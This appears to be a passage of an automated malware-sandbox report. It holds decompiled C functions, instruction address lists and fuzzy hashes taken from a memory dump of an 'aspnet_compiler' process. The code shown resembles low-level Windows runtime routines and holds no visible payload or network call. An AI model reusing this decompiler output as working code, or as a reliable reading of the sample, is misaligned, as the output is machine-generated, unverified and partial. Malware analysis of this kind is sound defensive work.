					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1337b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L01264620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0127E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0127e730
0x0127e736
0x0127e738
0x0127e73d
0x0127e73e
0x0127e740
0x0127e749
0x0127e765
0x0127e76a
0x0127e76b
0x0127e76c
0x0127e76d
0x0127e76e
0x0127e76f
0x0127e775
0x0127e777
0x0127e77e
0x012bb675
0x0127e784
0x0127e784
0x0127e789
0x0127e7a8
0x0127e7ac
0x0127e807
0x0127e7ae
0x0127e7ae
0x0127e7b1
0x0127e7b4
0x0127e7b9
0x0127e7c0
0x0127e7c4
0x0127e7ca
0x0127e7cc
0x00000000
0x0127e7d3
0x0127e7d6
0x00000000
0x00000000
0x0127e7ff
0x0127e802
0x00000000
0x00000000
0x0127e7f9
0x0127e7fc
0x00000000
0x00000000
0x0127e7f3
0x0127e7f6
0x00000000
0x00000000
0x0127e7ed
0x0127e7f0
0x00000000
0x00000000
0x0127e7e7
0x0127e7ea
0x00000000
0x00000000
0x012bb685
0x012bb688
0x00000000
0x00000000
0x012bb682
0x00000000
0x00000000
0x0127e7cc
0x0127e7d9
0x0127e7dc
0x0127e7de
0x0127e7de
0x0127e7ac
0x0127e7e4
0x0127e74b
0x0127e751
0x0127e759
0x0127e761
0x0127e761

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 319b0ef6c0dce6b6d19ee549e27095ed1f2a8a31167651531effa2cacc274788
Instruction ID: 2fd4008d39120350a8a7353758188b20329151c35b60d4d40b8f5ed00e9e5ce8
Opcode Fuzzy Hash: 319b0ef6c0dce6b6d19ee549e27095ed1f2a8a31167651531effa2cacc274788
Instruction Fuzzy Hash: 6B318D75A24249EFD704DF58D841B9AFBE8FB09314F158296FA04CB381D671EC80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0127BC2C Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0127BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1336100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E01262280(0xd, 0x600f1a0);
				_t41 =  *0x13360f8; // 0x0
				if(_t41 != 0) {
					 *0x13360f8 =  *_t41;
					 *0x13360fc =  *0x13360fc + 0xffff;
				}
				E0125FFB0(_t41, 0x800, 0x600f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x13360f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L01264620(0x1336100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1336100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0127bc36
0x0127bc42
0x0127bc45
0x0127bc4a
0x0127bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0127bc50
0x0127bc50
0x0127bc58
0x0127bc5a
0x0127bc60
0x00000000
0x00000000
0x012ba4f2
0x012ba4f6
0x00000000
0x00000000
0x00000000
0x012ba4fc
0x0127bc79
0x0127bc7e
0x0127bc86
0x0127bd16
0x0127bd20
0x0127bd20
0x0127bc8d
0x0127bc94
0x0127bcbd
0x0127bcca
0x0127bccb
0x0127bccc
0x0127bccd
0x0127bcce
0x0127bcd4
0x0127bcea
0x0127bcee
0x0127bcf2
0x0127bd00
0x0127bd04
0x00000000
0x0127bc96
0x0127bcab
0x0127bcaf
0x0127bd2c
0x0127bd2c
0x0127bd09
0x00000000
0x0127bd09
0x0127bcb1
0x0127bcb5
0x0127bcbb
0x00000000
0x00000000
0x00000000
0x0127bcbb

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa794b57d497be528a82bb780a6d44fcfe513918a5d81ea805f4ee3bd0da9169
Instruction ID: e4170f54ec92facd522f62e78cf26f5d33880d0bce8c24649827b124f4e9643b
Opcode Fuzzy Hash: fa794b57d497be528a82bb780a6d44fcfe513918a5d81ea805f4ee3bd0da9169
Instruction Fuzzy Hash: 9A31DF76A20616AFCB11DF58D4C27A777B8FB18310F044179EE44DB245E674DA458B84

Uniqueness

Uniqueness Score: -1.00%

Function 01249100 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E01249100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x131f6e8);
				E0129D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E013188F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0129D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x13386c0; // 0xdf07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x13386b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E01262280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E013188F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0128AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x133b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x13384c0;
										if(_t69 >=  *0x13384c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01319063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0124922A(_t82);
							_t53 = E01267D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01318B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x13386c0; // 0xdf07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x13386b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x13386bc;
										_t72 = 0x13386b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E01249240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x13386c4;
									_t72 = 0x13386c0;
									L18:
									E01279B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x01249100
0x01249100
0x01249100
0x01249100
0x01249102
0x01249107
0x0124910c
0x01249110
0x01249115
0x01249136
0x01249143
0x012a37e4
0x012a37e4
0x01249149
0x0124914e
0x0124914e
0x01249117
0x0124911d
0x00000000
0x00000000
0x0124911f
0x01249125
0x00000000
0x01249151
0x01249158
0x0124915d
0x01249161
0x01249168
0x012a3715
0x00000000
0x0124916e
0x0124916e
0x01249175
0x01249177
0x0124917e
0x0124917f
0x01249182
0x01249182
0x01249187
0x01249187
0x0124918a
0x0124918d
0x0124918f
0x01249192
0x01249195
0x01249198
0x01249198
0x01249198
0x0124919a
0x00000000
0x00000000
0x012a371f
0x012a3721
0x012a3727
0x012a372f
0x012a3733
0x012a3735
0x012a3738
0x012a373b
0x012a373d
0x012a3740
0x00000000
0x00000000
0x012a3746
0x012a3749
0x00000000
0x00000000
0x012a374f
0x012a3751
0x00000000
0x00000000
0x012a3757
0x012a3759
0x012a375c
0x012a375c
0x012a375e
0x012a375e
0x012a3761
0x012a3764
0x00000000
0x00000000
0x012a3766
0x012a3768
0x012a37a3
0x012a37a3
0x012a37a5
0x012a37a7
0x012a37ad
0x012a37b0
0x012a37b2
0x012a37bc
0x012a37c2
0x012a37c2
0x012a37b2
0x01249187
0x01249187
0x0124918a
0x0124918d
0x0124918f
0x01249192
0x01249195
0x00000000
0x01249195
0x00000000
0x01249187
0x012a376a
0x012a376a
0x012a376c
0x012a376c
0x012a376f
0x012a3775
0x00000000
0x00000000
0x012a3777
0x012a3779
0x00000000
0x00000000
0x012a3782
0x012a3787
0x012a3789
0x012a3790
0x012a3790
0x012a378b
0x012a378b
0x012a378b
0x012a3792
0x012a3795
0x012a3795
0x012a3798
0x012a3798
0x012a379b
0x012a379b
0x012491a3
0x012491a9
0x012491b0
0x012491b4
0x012491b4
0x012491bb
0x012491c0
0x012491c5
0x012491c7
0x012a37da
0x012491cd
0x012491cd
0x012491cd
0x012491d2
0x012491d5
0x01249239
0x01249239
0x012491d7
0x012491db
0x012491e1
0x012491e7
0x012491fd
0x01249203
0x0124921e
0x01249223
0x00000000
0x01249223
0x01249205
0x01249208
0x0124920c
0x01249214
0x01249214
0x012491e9
0x012491e9
0x012491ee
0x012491f3
0x012491f3
0x012491f3
0x012491e7
0x00000000
0x012491db
0x01249187
0x01249168

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 397482e3708fcda0179553547939dc7d0523d368523a84c898fea2fa40ea6a2c
Instruction ID: b6df7e1ad16849146e72afd646b0a6a8f534123902c3c407a6c02302d193156c
Opcode Fuzzy Hash: 397482e3708fcda0179553547939dc7d0523d368523a84c898fea2fa40ea6a2c
Instruction Fuzzy Hash: 5531D675A21246DFEF2ADB6CC448BAEBBB1BB4C328F14818DD60867241C370A9C0CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01271DB5 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E01271DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0126F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L01264620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0126F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x01271dc2
0x01271dc5
0x01271dc7
0x01271dcc
0x01271dce
0x01271dd6
0x01271ddf
0x01271de0
0x01271de1
0x01271de5
0x01271de8
0x01271def
0x01271df0
0x01271df6
0x01271df7
0x01271dfe
0x01271e1a
0x00000000
0x00000000
0x01271e0b
0x01271e12
0x01271e12
0x01271e00
0x01271e00
0x01271e05
0x01271e1e
0x01271e23
0x012b570f
0x012b5713
0x00000000
0x00000000
0x012b5719
0x012b5719
0x01271e2c
0x01271e2d
0x01271e2e
0x01271e2f
0x01271e31
0x01271e32
0x01271e35
0x01271e3d
0x012b5723
0x012b573d
0x012b573d
0x00000000
0x012b5723
0x01271e49
0x01271e4e
0x01271e4e
0x01271e09
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: d7f00ec2379221f134214b55e80ed6a85c09b87b4f7de47eae9664af810945f6
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 9321C432620119FFD725CF59CC80EABBBBDEF85680F214455EA019B250D634AE51C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01260050 Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E01260050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x133d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E01279ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0128B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01318A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E01279702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x133b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x01260055
0x0126005d
0x01260062
0x0126006c
0x0126006f
0x01260074
0x0126007a
0x0126007a
0x01260080
0x01260080
0x01260087
0x0126008d
0x0126008f
0x01260093
0x01260095
0x0126009b
0x012600f8
0x012600fb
0x012600fc
0x012600ff
0x01260108
0x01260108
0x012600a2
0x012600a6
0x012600b3
0x012600bc
0x012600c5
0x012600ca
0x012ac01e
0x00000000
0x00000000
0x012ac02d
0x012600d5
0x012600d9
0x012ac03d
0x012ac046
0x012ac046
0x012600df
0x012600e2
0x012600ea
0x012600ef
0x012600f2
0x012600f6
0x01260111
0x01260117
0x01260117
0x00000000
0x012600f6
0x012600d0
0x012600d0
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 620d9d107e381e553a9417951e4426a3c9df2050c1903a7e5b4df988c4b99591
Instruction ID: 1059a52975a8f8f857d8d92364da4d5ecbffafe099b658ad7892ae8be8f48fb2
Opcode Fuzzy Hash: 620d9d107e381e553a9417951e4426a3c9df2050c1903a7e5b4df988c4b99591
Instruction Fuzzy Hash: 9831BD31221B05CFDB26CF2CC840BA6B7E9FF88714F14456DE59A87B90EB71A841DB94

Uniqueness

Uniqueness Score: -1.00%

Function 012C6C0A Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E012C6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E01267D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1337b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L01264620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0128F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E01267D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E01289AE0();
						_t23 = L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x012c6c0a
0x012c6c0f
0x012c6c10
0x012c6c13
0x012c6c15
0x012c6c19
0x012c6c1c
0x012c6c21
0x012c6c28
0x012c6c3a
0x012c6c2a
0x012c6c33
0x012c6c33
0x012c6c3f
0x012c6c48
0x012c6c4d
0x012c6c60
0x012c6c65
0x012c6c69
0x012c6c73
0x012c6c79
0x012c6c7f
0x012c6c86
0x012c6c90
0x012c6c94
0x012c6ca6
0x012c6cb2
0x012c6cbd
0x012c6cbd
0x012c6cc3
0x012c6cc7
0x012c6ccb
0x012c6cd0
0x012c6cd1
0x012c6ce2
0x012c6ce2
0x012c6c69
0x012c6ced

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d919fd86143b8b5560aa8a926b2a9e26c99902f900e433e601767ebefe08ffd0
Instruction ID: dce719ccf2549f1f547625fa4c606952ba103901dedcc3617787d27f20708f99
Opcode Fuzzy Hash: d919fd86143b8b5560aa8a926b2a9e26c99902f900e433e601767ebefe08ffd0
Instruction Fuzzy Hash: 1321ABB1A20645AFD715DB68D884E6AB7B8FF48744F040169FA08C7790D634EE50CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 012890AF Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E012890AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0129D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0127E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L01264620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0128F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0127A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x012890af
0x012890b8
0x012890bb
0x012890bf
0x012890c2
0x012890c2
0x012890c8
0x012890cb
0x012890cd
0x012c14d7
0x012c14eb
0x012c14eb
0x00000000
0x012c14eb
0x012c14db
0x012c14e6
0x00000000
0x012c14f2
0x012c14e8
0x00000000
0x012c14e8
0x012890d8
0x012890da
0x012890dd
0x012890e5
0x00000000
0x01289139
0x012890fa
0x012890fe
0x01289142
0x00000000
0x01289142
0x01289104
0x01289107
0x0128910b
0x01289110
0x01289118
0x01289147
0x01289148
0x0128914f
0x01289150
0x01289151
0x01289152
0x01289156
0x0128915d
0x01289160
0x01289168
0x0128916c
0x012891bc
0x012891be
0x00000000
0x012891be
0x0128916e
0x01289173
0x01289176
0x00000000
0x00000000
0x0128917c
0x01289180
0x012891b5
0x00000000
0x012891b5
0x01289182
0x01289185
0x01289189
0x00000000
0x00000000
0x0128918e
0x01289190
0x01289198
0x00000000
0x00000000
0x012891a0
0x00000000
0x012891ad
0x012891ad
0x012891b0
0x012891b1
0x00000000
0x01289185
0x0128911a
0x0128911c
0x0128911f
0x01289125
0x01289127
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

